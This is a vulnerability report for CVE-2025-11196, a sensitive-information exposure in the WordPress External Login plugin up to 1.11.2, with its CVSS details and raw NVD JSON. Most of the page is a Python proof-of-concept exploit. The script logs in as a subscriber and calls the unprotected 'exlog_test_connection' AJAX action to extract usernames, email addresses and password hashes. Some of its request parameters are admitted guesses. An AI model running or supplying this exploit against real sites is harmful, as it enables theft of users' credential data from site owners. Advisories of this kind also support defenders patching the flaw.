Security Vulnerability Report
CVE-2025-11196 CVSS 4.3 MEDIUM

Published: 2025-10-15 09:15:42
Last Modified: 2026-04-15 00:35:42

Description

The External Login plugin for WordPress is vulnerable to sensitive information exposure in all versions up to, and including, 1.11.2 due to the 'exlog_test_connection' AJAX action lacking capability checks or nonce validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to query the configured external database and retrieve truncated usernames, email addresses, and password hashes via the diagnostic test results view.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

External Login for WordPress <= 1.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11196 PoC - External Login Plugin Sensitive Information Exposure
# Vulnerability: Missing capability checks and nonce validation in 'exlog_test_connection' AJAX action
# Affected: External Login plugin for WordPress <= 1.11.2
# Required: Subscriber-level authenticated access

import requests


class Exploit:
    def __init__(self, target_url, username, password):
        self.target_url = target_url.rstrip('/')
        self.session = requests.Session()
        self.username = username
        self.password = password
        self.ajax_url = f"{self.target_url}/wp-admin/admin-ajax.php"

    def login(self):
        """Authenticate as a subscriber-level user"""
        login_data = {
            'log': self.username,
            'pwd': self.password,
            'wp-submit': 'Log In',
            'redirect_to': f"{self.target_url}/wp-admin/",
            'testcookie': '1'
        }
        # Set test cookie first (required by WordPress)
        self.session.get(f"{self.target_url}/wp-login.php")
        self.session.cookies.set('wordpress_test_cookie', 'WP%20Cookie%20check')
        response = self.session.post(
            f"{self.target_url}/wp-login.php",
            data=login_data,
            allow_redirects=False
        )
        if 'wordpress_logged_in' in self.session.cookies.get_dict():
            print("[+] Successfully logged in")
            return True
        print("[-] Login failed")
        return False

    def exploit(self):
        """Trigger the vulnerable AJAX endpoint to extract sensitive data"""
        # The exlog_test_connection AJAX action lacks capability checks
        # It accepts connection parameters and returns database test results
        # including truncated usernames, emails, and password hashes
        payload = {
            'action': 'exlog_test_connection',
            # Parameters may vary based on plugin configuration
            'db_host': 'localhost',
            'db_name': 'external_users',
            'db_user': 'ext_user',
            'db_pass': 'ext_pass',
            'db_table': 'wp_users'
        }
        response = self.session.post(self.ajax_url, data=payload)
        if response.status_code == 200 and response.text:
            print("[+] Sensitive data extracted:")
            print(response.text)
            return response.text
        print("[-] Exploit failed")
        return None


if __name__ == "__main__":
    # Usage example
    exploit = Exploit(
        target_url="https://target-wordpress-site.com",
        username="subscriber_user",
        password="subscriber_password"
    )
    if exploit.login():
        exploit.exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11196", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:42.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The External Login plugin for WordPress is vulnerable to sensitive information exposure in all versions up to, and including, 1.11.2 due to the 'exlog_test_connection' AJAX action lacking capability checks or nonce validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to query the configured external database and retrieve truncated usernames, email addresses, and password hashes via the diagnostic test results view."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/external-login/trunk/login/db.php#L215", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/external-login/trunk/options/testing_ajax.php#L3", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/external-login/trunk/views/test_results.php#L21", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bdb40f51-dac2-40e7-beb1-154d982f7af3?source=cve", "source": "[email protected]"}]}}